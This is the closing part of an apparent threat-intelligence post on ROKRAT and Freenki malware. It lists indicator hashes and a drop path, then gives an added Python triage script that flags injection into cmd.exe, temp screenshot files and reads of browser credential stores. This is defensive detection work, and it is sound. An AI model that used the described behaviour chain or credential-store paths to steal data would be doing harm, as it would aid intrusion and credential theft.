href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">NGIPS</a>, and <a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2>IOCs</h2><br />Path: c:\ProgramData\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5
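An added example drawing together the host-side behaviours described in this post as triage rules over endpoint telemetry: the HncModuleUpdate.exe drop path, the remote thread into a freshly started cmd.exe, the %04X%04X.tmp screenshot files in the temp directory, reads of browser credential stores by non-browser processes, and the IOC hashes listed above. This is not Talos detection content; the event records are constructed in a simplified Sysmon-like shape and the field names (`event`, `image`, `target`, `source_image`, `target_image`, `sha256`) are assumptions to map onto whatever telemetry schema is in use.

```python
"""Triage rules over endpoint telemetry for the behaviours this post describes.

Added example, not Talos detection content. Event records are dicts in a
simplified Sysmon-like shape; the field names are assumptions. Hashes are the
IOCs listed in the post.
"""
import re

IOC_SHA256 = {
    "171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824": "MalDoc",
    "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037": "Dropper #1",
    "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14": "Dropper #2",
    "9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f": "Dropper #3",
    "b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e": "ROKRAT",
    "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5": "Freenki",
}
DROP_PATH = r"c:\programdata\hncmoduleupdate.exe"
# %s%04X%04X.tmp with %s = GetTempPath(): eight hex digits + .tmp under a temp dir.
SCREENSHOT_RE = re.compile(r"\\temp\\[0-9a-f]{8}\.tmp$")
# Chrome "Login Data" (SQLite) and Firefox stores; logins.json is an assumption
# for newer Firefox builds, signons.sqlite for older ones.
CRED_STORES = ("\\login data", "\\signons.sqlite", "\\logins.json")
BROWSERS = ("chrome.exe", "firefox.exe", "iexplore.exe")


def _lower(e: dict, key: str) -> str:
    return str(e.get(key, "")).lower()


def evaluate(e: dict) -> list:
    """Return the names of the rules that fire on one event."""
    hits = []
    kind = e.get("event")
    if _lower(e, "sha256") in IOC_SHA256:
        hits.append("ioc_hash:" + IOC_SHA256[_lower(e, "sha256")])
    path_key = "image" if kind == "process_create" else "target"
    if kind in ("process_create", "file_create") and _lower(e, path_key) == DROP_PATH:
        hits.append("rokrat_drop_path")
    if (kind == "create_remote_thread"
            and _lower(e, "target_image").endswith("\\cmd.exe")
            and not _lower(e, "source_image").startswith("c:\\windows\\")):
        hits.append("remote_thread_into_cmd")
    if kind == "file_create" and SCREENSHOT_RE.search(_lower(e, "target")):
        hits.append("temp_hex_tmp_file")
    if (kind == "file_access"
            and any(s in _lower(e, "target") for s in CRED_STORES)
            and not _lower(e, "image").endswith(BROWSERS)):
        hits.append("non_browser_reads_credential_store")
    return hits


def triage(events) -> dict:
    """Map rule name -> list of event ids that matched, over a batch of events."""
    result = {}
    for e in events:
        for name in evaluate(e):
            result.setdefault(name, []).append(e["id"])
    return result


# Constructed sample events following the chain described in the post.
SAMPLE_EVENTS = [
    {"id": 1, "event": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\ProgramData\HncModuleUpdate.exe"},
    {"id": 2, "event": "process_create", "image": r"C:\ProgramData\HncModuleUpdate.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "sha256": "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"},
    {"id": 3, "event": "create_remote_thread",
     "source_image": r"C:\ProgramData\HncModuleUpdate.exe",
     "target_image": r"C:\Windows\System32\cmd.exe"},
    {"id": 4, "event": "file_create", "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\victim\AppData\Local\Temp\1A2B3C4D.tmp"},
    {"id": 5, "event": "file_access", "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # Benign: the browser itself reading its own store.
    {"id": 6, "event": "file_access",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # Excluded: OS component as the thread source.
    {"id": 7, "event": "create_remote_thread",
     "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for rule, ids in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: events {ids}")
```

The cloud C2 (pCloud, Box, Dropbox and Yandex over HTTPS) is deliberately not a rule here: as the conclusion above notes, that traffic hides among legitimate use of the same platforms, so the host-side behaviours are the more reliable pivot, and the hash rule only catches the exact samples listed.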